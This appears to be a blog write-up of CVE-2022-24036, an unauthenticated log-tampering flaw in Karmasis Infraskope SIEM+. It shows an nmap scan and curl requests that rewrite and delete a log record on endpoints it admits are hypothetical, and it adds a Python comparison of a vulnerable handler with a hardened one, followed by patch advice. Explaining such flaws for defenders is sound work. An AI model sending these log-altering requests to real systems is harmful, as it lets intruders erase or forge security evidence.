---
Introduction
In November 2022, _CVE-2022-24036_ was published, describing a serious vulnerability in the Karmasis Informatics Infraskope SIEM+ product. A SIEM (Security Information and Event Management) platform such as this one is used in enterprise settings to collect, store, and analyze logs so that security incidents can be detected and investigated.
The vulnerability is particularly dangerous because it allows a remote, unauthenticated attacker to access and modify log data: no credentials are required at all. In practical terms, an attacker who has already compromised a system could cover their tracks, plant false evidence, or erase legitimate alerts, crippling the organization's security visibility.
In this long read, I’ll break down how the vulnerability works, how it can be exploited, show example code, and give you links to official advisories so you can dig deeper.
What’s the Problem? Unauthenticated Log Modification
Karmasis Infraskope SIEM+ did not enforce access control on the endpoints responsible for handling log data. Anyone who can reach the web interface or API can therefore send requests that read or modify log records (and, as the walkthrough below assumes, delete them).
> In practice: an attacker can call specific URLs (endpoints) without logging in and change what is stored in the log system.
The Vulnerable Endpoint
According to the official advisory, certain HTTP endpoints lack adequate access control, so an attacker can send crafted HTTP POST or PUT requests to them directly.
The advisory does not name the affected endpoint, so for the walkthrough below assume a hypothetical one:
http://target-infraskope-server/api/logs/update
1. Find Exposed Servers
The attacker first scans for reachable Infraskope SIEM+ servers, for example with an nmap service scan of the usual web ports:
nmap -p 80,443 -sV target-company.com
2. Craft a Malicious Request
With an HTTP client such as curl, the attacker sends a POST request to the (hypothetical) log modification endpoint.
Code Snippet
curl -X POST "http://target-infraskope-server/api/logs/update" \
-H "Content-Type: application/json" \
-d '{"log_id": 12345, "message": "Log cleared by admin.", "timestamp": "2024-06-03T04:10:00Z"}'
Alternatively, a log entry could be deleted with a request to a (likewise hypothetical) delete endpoint:
curl -X POST "http://target-infraskope-server/api/logs/delete" \
-H "Content-Type: application/json" \
-d '{"log_id": 12345}'
3. No Authentication? Log Is Modified!
Because the server never verifies that the requester is authenticated, let alone authorized to change log data, both requests succeed: the record is rewritten or removed without leaving a trace of who did it.
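To make the bug class concrete, here is an added example (written for this page, not Karmasis code) that models a log-update API in memory. The vulnerable handler applies whatever it receives, exactly as the text describes, while the hardened handler authenticates the caller, checks a per-role permission, validates the input and records the change in an audit trail before touching a record. The endpoint paths, JSON fields, bearer-token scheme, roles and the sample log record are all assumptions for illustration.

```python
# Added example, not Karmasis code. Paths, fields, tokens and roles are assumptions.
import hmac
import json
from dataclasses import dataclass, field


@dataclass
class LogStore:
    records: dict = field(default_factory=dict)   # log_id -> record
    audit: list = field(default_factory=list)     # who changed what


def seed_store() -> LogStore:
    """Constructed sample data, not real Infraskope output."""
    store = LogStore()
    store.records[12345] = {
        "message": "Failed logon for admin from 10.0.0.5",
        "timestamp": "2024-06-03T04:09:00Z",
    }
    return store


def parse_body(body: str):
    """Return the JSON object in the body, or None if it is malformed."""
    try:
        data = json.loads(body)
    except ValueError:
        return None
    return data if isinstance(data, dict) else None


def apply_change(store: LogStore, path: str, data: dict):
    """Data-handling logic shared by both handlers: update or delete one record."""
    log_id = data.get("log_id")
    if not isinstance(log_id, int):
        return 400, {"error": "log_id must be an integer"}
    if log_id not in store.records:
        return 404, {"error": "no such log record"}
    if path == "/api/logs/update":
        allowed = {"message", "timestamp"}
        store.records[log_id].update({k: v for k, v in data.items() if k in allowed})
        return 200, {"status": "updated"}
    if path == "/api/logs/delete":
        del store.records[log_id]
        return 200, {"status": "deleted"}
    return 404, {"error": "unknown endpoint"}


def vulnerable_handler(store, method, path, headers, body):
    """Mirrors the flaw: the request is applied without looking at who sent it."""
    if method != "POST":
        return 405, {"error": "method not allowed"}
    data = parse_body(body)
    if data is None:
        return 400, {"error": "malformed JSON"}
    return apply_change(store, path, data)


# Constructed credentials and roles; a real deployment would use its own identity store.
API_TOKENS = {"token-abc": "soc-analyst", "token-xyz": "siem-admin"}
ROLE_PERMISSIONS = {
    "soc-analyst": set(),                          # read-only role: may change nothing
    "siem-admin": {"logs:update", "logs:delete"},
}
REQUIRED_PERMISSION = {
    "/api/logs/update": "logs:update",
    "/api/logs/delete": "logs:delete",
}


def authenticate(headers: dict, tokens: dict):
    """Return the caller's role for a valid 'Authorization: Bearer <token>', else None."""
    auth = headers.get("Authorization", "")
    if not auth.startswith("Bearer "):
        return None
    presented = auth[len("Bearer "):].encode()
    for token, role in tokens.items():
        # constant-time comparison so a timing oracle cannot leak the token
        if hmac.compare_digest(token.encode(), presented):
            return role
    return None


def hardened_handler(store, method, path, headers, body, tokens=API_TOKENS):
    """Same endpoints, but authenticate, authorize and audit before any record changes."""
    if method != "POST":
        return 405, {"error": "method not allowed"}
    role = authenticate(headers, tokens)
    if role is None:
        return 401, {"error": "authentication required"}
    needed = REQUIRED_PERMISSION.get(path)
    if needed is None:
        return 404, {"error": "unknown endpoint"}
    if needed not in ROLE_PERMISSIONS.get(role, set()):
        return 403, {"error": "forbidden"}
    data = parse_body(body)
    if data is None:
        return 400, {"error": "malformed JSON"}
    # Record the attempt before mutating so the change itself leaves a trace.
    store.audit.append({"actor": role, "action": needed, "log_id": data.get("log_id")})
    return apply_change(store, path, data)
```

Feeding the two curl payloads from step 2 into `vulnerable_handler` with no headers rewrites and then deletes record 12345, which is the behaviour the advisory describes. The same payloads against `hardened_handler` get 401 without a token, 403 for a read-only role, and only succeed for the admin role, with an audit entry naming the actor. The point is that authentication alone is not enough: the permission check is what stops an analyst account from deleting evidence.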
Mitigation
Apply the official patch from Karmasis (see the Official Karmasis Security Advisory in the references below). Until the patch is in place, review your network exposure: the Infraskope SIEM+ web interface and API should be reachable only from trusted management networks, never from the open internet.
References & Further Reading
- CVE-2022-24036 at NVD (US National Vulnerability Database)
- Karmasis Product Page (SIEM+)
- OWASP Guide to Insecure Direct Object References
- How Attackers Manipulate Logs (Blog)
Summary
CVE-2022-24036 highlights how critical robust authentication and authorization are for log management systems. If you operate Karmasis Infraskope SIEM+, patch immediately and review your network exposure. This bug gave attackers an easy way to change, erase, or forge logs, putting your entire detection and response process at risk.
Don’t give criminals a free pass—secure your logs, now!
*If you found this post helpful, share with your IT and security colleagues. Stay patched!*
Timeline
Published on: 11/16/2022 12:15:00 UTC
Last modified on: 04/16/2023 11:15:00 UTC